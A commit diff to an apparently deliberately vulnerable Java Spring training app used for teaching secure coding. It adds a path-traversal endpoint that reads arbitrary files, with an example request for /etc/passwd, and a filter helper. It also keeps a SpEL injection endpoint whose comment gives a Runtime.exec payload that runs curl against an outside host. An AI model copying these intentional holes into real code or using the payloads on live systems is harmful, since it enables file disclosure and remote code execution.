add pathTraversal

Author: JoyChou93

README.md

@@ -75,7 +75,7 @@ Sort by letter.
 
 ## How to run
 
-The application will use mybatis auto-injection. Please run mysql ahead of time and configure the mysql database.
+The application will use mybatis auto-injection. Please run mysql server ahead of time and configure the mysql server database's name and username/password.
 
 ``` 
 spring.datasource.url=jdbc:mysql://127.0.0.1:3306/java_sec_code
@@ -153,6 +153,10 @@ Build package and run.
 mvn clean package -DskipTests 
 java -jar target/java-sec-code-1.0.0.jar
 ```
+## Contributors
+
+Core developers : [JoyChou](https://github.com/JoyChou93).
+Other developers: [lightless](https://github.com/lightless233),  [Anemone95](https://github.com/Anemone95). 
 
 
 ## Donate

README_zh.md

@@ -72,7 +72,7 @@ Tomcat默认JSESSION会话有效时间为30分钟，所以30分钟不操作会
 
 ## 如何运行
 
-应用会用到mybatis自动注入，请提前运行mysql，并且进行mysql数据库配置。
+应用会用到mybatis自动注入，请提前运行mysql服务，并且配置mysql服务的数据库名称和用户名密码。
 
 ``` 
 spring.datasource.url=jdbc:mysql://127.0.0.1:3306/java_sec_code
@@ -136,6 +136,10 @@ mvn clean package -DskipTests
 java -jar 打包后的jar包路径
 ```
 
+## 贡献者
+
+核心开发者： [JoyChou](https://github.com/JoyChou93).其他开发者：[lightless](https://github.com/lightless233),  [Anemone95](https://github.com/Anemone95)。欢迎各位提交PR。
+
 ## 捐赠
 
 如果你喜欢这个项目，你可以捐款来支持我。 有了你的支持，我将能够更好地制作`Java sec code`项目。

pom.xml

@@ -9,6 +9,11 @@
     <version>1.0.0</version>
     <packaging>war</packaging>
 
+    <properties>
+        <maven.compiler.source>1.8</maven.compiler.source> <!-- mvn clean package-->
+        <maven.compiler.target>1.8</maven.compiler.target>
+    </properties>
+
 
     <parent>
         <groupId>org.springframework.boot</groupId>

src/main/java/org/joychou/controller/PathTraversal.java

@@ -0,0 +1,56 @@
+package org.joychou.controller;
+
+import org.apache.commons.codec.binary.Base64;
+import org.joychou.security.SecurityUtil;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+import java.io.File;
+import java.io.IOException;
+import java.nio.charset.StandardCharsets;
+import java.nio.file.Files;
+import java.nio.file.Paths;
+
+@RestController
+public class PathTraversal {
+
+    protected final Logger logger = LoggerFactory.getLogger(this.getClass());
+
+    /**
+     * http://localhost:8080/path_traversal/vul?filepath=../../../../../etc/passwd
+     */
+    @GetMapping("/path_traversal/vul")
+    public String getImage(String filepath) throws IOException {
+        return getImgBase64(filepath);
+    }
+
+    @GetMapping("/path_traversal/sec")
+    public String getImageSec(String filepath) throws IOException {
+        if (SecurityUtil.pathFilter(filepath) == null) {
+            logger.info("Illegal file path: " + filepath);
+            return "Bad boy. Illegal file path.";
+        }
+        return getImgBase64(filepath);
+    }
+
+    private String getImgBase64(String imgFile) throws IOException {
+
+        logger.info("Working directory: " + System.getProperty("user.dir"));
+        logger.info("File path: " + imgFile);
+
+        File f = new File(imgFile);
+        if(f.exists() && !f.isDirectory()) {
+            byte[] data = Files.readAllBytes( Paths.get(imgFile) );
+            return new String( Base64.encodeBase64(data) );
+        } else {
+            return "File doesn't exist or is not a file.";
+        }
+    }
+
+    public static void main(String[] argv) throws IOException {
+        String aa = new String(Files.readAllBytes(Paths.get("pom.xml")), StandardCharsets.UTF_8);
+        System.out.println(aa);
+    }
+}

src/main/java/org/joychou/controller/SSRF.java

@@ -31,7 +31,6 @@
  * @desc    Java ssrf vuls code.
  */
 
-
 @Controller
 @RequestMapping("/ssrf")
 public class SSRF {

src/main/java/org/joychou/controller/SPEL.java renamed to src/main/java/org/joychou/controller/SpEL.java

@@ -1,29 +1,30 @@
 package org.joychou.controller;
 
+import org.springframework.expression.EvaluationContext;
 import org.springframework.expression.ExpressionParser;
 import org.springframework.expression.spel.standard.SpelExpressionParser;
-import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.RequestMapping;
-import org.springframework.web.bind.annotation.ResponseBody;
-import javax.servlet.http.HttpServletRequest;
+import org.springframework.web.bind.annotation.RestController;
+
 
 /**
-    @author   JoyChou ([email protected])
-    @date     2019.01.17
-    @esc      SPEL leas to RCE
-    @usage    http://localhost:8080/spel/rce?expression=xxx. xxx is urlencode(exp)
-    @exp      T(java.lang.Runtime).getRuntime().exec("curl xxx.ceye.io")
+ * SpEL Injection
+ *
+ * @author JoyChou @2019-01-17
  */
+@RestController
+public class SpEL {
 
-@Controller
-@RequestMapping("/spel")
-public class SPEL {
-
-    @RequestMapping("/rce")
-    @ResponseBody
-    private static String rce(HttpServletRequest request) {
-        String expression = request.getParameter("expression");
+    /**
+     * SPEL to RCE
+     * http://localhost:8080/spel/vul/?expression=xxx.
+     * xxx is urlencode(exp)
+     * exp: T(java.lang.Runtime).getRuntime().exec("curl xxx.ceye.io")
+     */
+    @RequestMapping("/spel/vul")
+    private static String rce(String expression) {
         ExpressionParser parser = new SpelExpressionParser();
+        // fix method: SimpleEvaluationContext
         String result = parser.parseExpression(expression).getValue().toString();
         return result;
     }

src/main/java/org/joychou/security/SecurityUtil.java

@@ -1,9 +1,15 @@
 package org.joychou.security;
 
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+
+import java.io.UnsupportedEncodingException;
 import java.net.URI;
+import java.net.URLDecoder;
 
 public class SecurityUtil {
 
+    protected static Logger logger = LoggerFactory.getLogger(SecurityUtil.class);
     /**
      * 通过endsWith判断URL是否合法
      *
@@ -72,4 +78,32 @@ public static boolean checkSSRFByHostWlist(String url, String[] hostWlist) {
         return checkURLbyEndsWith(url, hostWlist);
     }
 
+    /**
+     * Filter file path to prevent path traversal vulns.
+     *
+     * @param filepath file path
+     * @return illegal file path return null
+     */
+    public static String pathFilter(String filepath) {
+        String temp = filepath;
+
+        // use while to sovle multi urlencode
+        while (temp.indexOf('%') != -1) {
+            try {
+                temp = URLDecoder.decode(temp, "utf-8");
+            } catch (UnsupportedEncodingException e) {
+                logger.info("Unsupported encoding exception: " + filepath);
+                return null;
+            } catch (Exception e) {
+                logger.info(e.toString());
+                return null;
+            }
+        }
+
+        if (temp.indexOf("..") != -1 || temp.charAt(0) == '/') {
+            return null;
+        }
+
+        return filepath;
+    }
 }

src/main/resources/templates/index.html

@@ -8,7 +8,5 @@
     <p>Hello <span th:text="${user}"></span>.</p>
     <p>Welcome to login java-sec-code application.</p>
     <a th:href="@{/logout}">logout</a>
-
-    <p></p>
 </body>
 </html>